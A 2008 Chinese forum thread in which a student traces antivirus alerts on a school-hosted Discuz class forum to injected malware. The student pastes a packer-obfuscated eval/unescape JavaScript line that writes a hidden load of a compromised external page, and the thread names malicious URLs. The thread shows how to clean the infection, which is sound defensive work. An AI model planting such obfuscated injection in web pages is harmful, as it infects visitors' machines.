Board logo

主題: [求助] [已解決]申請的論壇伺服器有木馬? [打印本頁]

發表人: GPLynn    時間: 2008-12-5 08:27 PM     主題: [已解決]申請的論壇伺服器有木馬?

請教一下,我跟我們學校申請了一個空間以做為放置小型班級論壇之用。
但是在架設完之後,使用時防毒軟體卻會出現如下的警告。

不只我的KIS,其它同學的小紅傘等各知名防毒軟體都有類似情況。
但是我將論壇所有檔案下載回來掃毒卻又沒有其它發現。
另外,防毒軟體上出現的那個網址也不曉得哪來的,跟我們班級論壇毫無關係。
值得注意的是,這種情況不是一直發生,有時候會一直頻繁出現,有時候又完全沒反應。
是伺服器遭人入侵嗎?我有什麼方法可以防堵呢?還是只能請求校方資訊處加強防護的等級呢?

[GPLynn 在  2008-12-7 01:49 AM 作了最後編輯]
發表人: 陽だまり    時間: 2008-12-6 12:09 AM

您可能要檢查一下那個空間
那個空間會在你的網頁植入一些程式碼
會連結到底下網址(請勿點!!!!

CODE:
[Copy to clipboard]
http://digg.mine.nu/exe.php
而該網址在此網頁的列表中,可檢視一下(這個可以點
http://www.itis.tw/badlink

建議換個空間使用
發表人: GPLynn    時間: 2008-12-6 01:38 AM

學校資訊室提供的空間應該不會是校方植入的程式碼吧?
有沒有可能是學校的伺服被Hack所導致?
我有方法可以去防堵嗎?
我也不曉得怎麼去檢查空間,最多就是把裡面的檔案全部抓下來掃毒,但是試過了,沒有異狀。
發表人: 陽だまり    時間: 2008-12-6 02:39 AM

原來是學校提供的空間

被hack倒是也有可能
不過我剛看了一下

CODE:
[Copy to clipboard]
http://www.laa.org.tw/
http://www.laa.org.tw/index.php
http://www.laa.org.tw/joomla/
http://www.laa.org.tw/joomla/index.php
並沒有被植入任何東西,所以不見得會被hack的關係
建議您,先刪除report資料夾裡的所有東西
然後再上傳一個乾淨的頁面,試試會不會有同樣的狀況
如果沒有的話,會不會是您取得的程式可能有問題

沒看到實際的東西,先這樣猜測

[陽だまり 在  2008-12-6 02:40 AM 作了最後編輯]
發表人: GPLynn    時間: 2008-12-6 04:01 AM

最令我疑惑的是...
http://www.laa.org.tw/
這個網址跟我的班網的網址是八竿子打不著丫~也不曉得是load到哪個檔導過去那個網址的。
不過現在學校的那個伺服器掛點中~也沒辦法試~
而且防毒軟體的警告也不是每次都有,在某個時間區段瀏覽時就刷一次畫面出現一次。
在其它的時間區段就一點反應都沒有,感覺就像是有人在搞鬼時才會出問題。
發表人: 陽だまり    時間: 2008-12-6 04:15 AM

GPLynn兄要不要把您班網的網址貼出來一下

www.laa.org.tw的網址確實是樂活動物協會註冊的沒有錯
Domain Name: laa.org.tw
Registrant:
台灣樂活動物協會
LOHAS Animal Association of Taiwan
No.34-1, Yingxu 1st St., Yangmei Town, Taoyuan County
發表人: GPLynn    時間: 2008-12-6 10:43 AM

班網的網址我pm給您了!
另外,學校的主機從昨晚就掛點了!實在一整個不穩。
我可能會另外找個空間來放論壇吧!學校的空間就當備用的。
發表人: 陽だまり    時間: 2008-12-6 04:31 PM

查了同台主機的php網頁,並無該網頁病毒的問題
應該只剩下您的資料庫或者是論壇程式本身就有附贈網頁病毒這樣

論壇原始碼是官方下載的嗎
如果是的話,那就是資料庫裡被灌入病毒
如果不是的話,請檢查論壇原始碼
因為剛我到官方下載6.10版的原始碼並無此問題
發表人: GPLynn    時間: 2008-12-6 08:01 PM

架設的人不是我,我是這兩天代管,不過下學期就換我要管理了~
那要怎麼檢查論壇原始碼呢?一個一個檢查php的內容嗎?
我有將檔案抓下來,利用搜尋"檔案裡的字或片語"來查找"www.laa.org.tw",可是沒有發現。
我寒假的時候大概會把Discuz換掉,它有太多的功能我們都用不到,似乎不太好掌控。
能推薦個適合的軟體嗎?
phpbb好像還不錯?!
發表人: 陽だまり    時間: 2008-12-6 09:44 PM

找c.toString試試
用程式可以一次搜尋所有的檔案內容
例如emeditor

不過把論壇換程式
您確定資料庫二個可互通?
發表人: GPLynn    時間: 2008-12-6 10:51 PM

有耶~
我用emeditor跟關鍵字c.toString去找,有找到一堆檔案,之後該怎麼處理呢?
我又另外去下載了原始未安裝的檔案,但是在相對應的目錄裡似乎沒有那些檔。
可以問一下c.toString大概是什麼意思呢?
因為還是找不到有www.laa.org.tw的相關內容。

另外,有c.toString的命令列都是下面這個樣子,是只要刪除這個字串後再上傳回去就可以了嗎?

CODE:
[Copy to clipboard]
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('k(l("m.n%o.p%q%0%f%6%g%7%2%8%r%6%s%9%1%3%4%4%a%t%5%5%b%0%c%c%d%7%0%e%2%d%e%u%5%0%e%b%2%v%d%a%3%a%1%8%w%0%b%4%3%9%1%h%1%8%3%2%0%c%3%4%9%1%h%1%i%x%5%0%f%6%g%7%2%i%j%j%y"));',35,35,'2C105|2C34|2C101|2C104|2C116|2C47|2C114|2C109|2C32|2C61|2C112|2C100|2C103|2C46|2C110|2C102|2C97|2C48|2C62|29|eval|unescape|document|write|28String|fromCharCode|2860|2C115|2C99|2C58|2C117|2C120|2C119|2C60|3B'.split('|'),0,{}))</script>

發表人: 陽だまり    時間: 2008-12-7 12:17 AM

您可以把<script></script>裡面的東西包括<script></script>都刪掉
然後重新上傳

至於www.laa.org.tw的網址應該就是上面的javascript反解之後得出的結果
建議您可以到www.laa.org.tw並寄信給管理者
請他把底下這個資料夾的有毒網頁給移除
以免更多人受害(底下連結勿連,有毒

CODE:
[Copy to clipboard]
http://www.laa.org.tw/report/index.php

發表人: GPLynn    時間: 2008-12-7 01:51 AM

您真是高深莫測,真是內行丫!
目前班網似乎運作正常了!
www.laa.org.tw那邊等等我就寫信去通知他們。
真的是十分感謝您的協助!




歡迎光臨 TWed2k (http://twed2k.org/) Powered by Discuz! 4.1.0